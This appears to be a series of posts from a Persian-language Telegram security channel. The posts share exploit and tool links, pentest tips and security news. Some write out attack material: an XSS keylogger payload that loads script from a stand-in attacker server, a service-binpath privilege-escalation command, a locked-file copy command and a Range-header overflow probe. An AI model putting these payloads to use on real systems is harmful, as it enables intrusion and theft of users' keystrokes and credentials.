آسیب پذیری RCE بر روی نسخه آخر Apache Solr یعنی نسخه 8.3.0 نیز کار میکند.

https://www.exploit-db.com/exploits/47572

#apache
#rce
#exploit


@sec_nerd

روت شدن اندروید ۱۰ با باز کردن یک لینک در کروم!


#android
#poc
#privesc

@sec_nerd

حرکت جدید مایکروسافت و ارائه ی Application Guard باعث شد که حتی با فعال شدن ماکروها هم نشه کاری از پیش برد و کسانی که با spear phishing اهداف خودشون رو آلوده میکردن کارشون سخت تر از قبل بشه!


#spear_phishing
#microsoft
#windows


@sec_nerd

استخراج پسورد دوربین های cctv شرکت bosch بدون نیاز به احراز هویت

#cctv
#network



@sec_nerd

ffuf - A fast web fuzzer written in Go.

https://github.com/ffuf/ffuf


#web
#pentest


@sec_nerd

بالا بردن سطح دسترسی در شبکه های ویندوزی

قسمت اول:
https://blog.compass-security.com/2019/07/privilege-escalation-in-windows-domains-1-3/

قسمت دوم:
https://blog.compass-security.com/2019/08/privilege-escalation-in-windows-domains-2-3/

قسمت سوم:
https://blog.compass-security.com/2019/08/privilege-escalation-in-windows-domains-3-3/


#privesc
#windows
#network
#AD


@sec_nerd

درود بر ادمین های همیشه آپدیت کشورمون.
رتبه سوم هم بد نیست!


#security
#botnet
#ddos


@sec_nerd

کپی کردن فایلهای قفل شده توسط سیستم عامل ویندوز ۱۰ با دستور زیر:

C:\WINDOWS\system32\esentutl.exe /y <SOURCE> /vss /d <DEST>


#windows
#pentest


@sec_nerd

ابزار استخراج کوکی ها و پسوردها از مروگر کروم
نوشته شده با #C


https://github.com/rasta-mouse/CookieMonster


#chrome
#enum


@sec_nerd

مجموعه پسوردهای پیشفرض دستگاه های کنترل صنعتی

https://www.critifence.com/default-password-database/


#SCADA
#pentest
#network


@sec_nerd

Manually Detect Remote Integer Overflow:

1. Note Content-Length. EX: 612
2. Take NO < Content-Length. Ex: 610
3. Add (610+612 = 1222)
4. Request Header - 'Range: bytes= -1222' => SAME RESPONSE
5. Subtract 9223372036854775808 - 1222 = 9223372036854774586
6. Request With Header - 'Range: bytes= -1222,-9223372036854774586' => BooM :)



#web
#pentest


@sec_nerd

CVE-2019-1322
as service user "sc config usosvc binpath= evil.exe" the easiest way eop from service user to system, worked for more than 1 year!


https://twitter.com/decoder_it/status/1193496591140818944?s=20

تست نشده!

#windows
#privesc
#pentest



@sec_nerd

کشف باگ در میکروتیک
https://github.com/tenable/routeros/blob/master/slides/bug_hunting_in_routeros_derbycon_2018.pdf

تعدادی از اکسپلویت های مربوط به میکروتیک؛
https://github.com/tenable/routeros/tree/master/poc


یک رایت آپ در خصوص نفوذ به میکروتیک و ایجاد سطح دسترسی روت:
https://medium.com/tenable-techblog/routeros-chain-to-root-f4e0b07c0b21



#mikrotik
#routeros
#network
#pentest


@sec_nerd

کشف آسیب پذیری ها با کمک nmap با ابزار vscan

https://github.com/xvass/vscan


#nmap
#pentest

@sec_nerd

رایت آپ کشف باگ LFD و دریافت ۱۷ هزار دلار جایزه


https://samcurry.net/reading-asp-secrets-for-17000/


#writeup
#lfd
#web
#pentest


@sec_nerd

گروه امنیت اطلاعات

https://t.iss.one/joinchat/Cu-7qUvIA5ULBMsmH9yVzA



@sec_nerd

رایت آپ کشف باگ RCE در سایت nokia.com


https://link.medium.com/g8CtDVAay1



#writeup
#rce
#pentest


@sec_nerd

Remote XSS Keylogger:

Payload: <svg/onload=setTimeout(function(){d=document;z=d.createElement("script");z.src="//YOUR_SERVER/keylogger.js";d.body.appendChild(z)},0)>

This will log a user's input to your remote server.

keylogger.php: https://pastebin.com/hzzQqSFt

keylogger.js: https://pastebin.com/ySyG4TiN

#BugBounty
#web
#pentest
#XSS


@sec_nerd

فیسبوک دوربین گوشی های آیفون را بصورت مخفیانه روشن میکند!
این اتفاق از سوی برخی کاربران در توییتر گزارش و ویدیوهای اثبات آن منتشر شده است.
هنوز مشخص نیست باز شدن دوربین جلوی گوشی های آیفون یک مشکل نرم افزاری ست یا فیسبوک در حال جاسوسی از کاربران خود میباشد.



https://thehackernews.com/2019/11/facebook-ios-camera.html



#facebook
#privacy
#news



@sec_nerd

اگر سایت هدف اپلیکیشن اندروید دارد:

بعد از دانلود اپ
از Diggy برای استخراج آدرس های وب آن استفاده کنید
از Arjun برای پیدا کردن پارامترهای ارسالی به آدرس های مذکور استفاده کنید.



#android
#pentest
#web
#bugbounty



@sec_nerd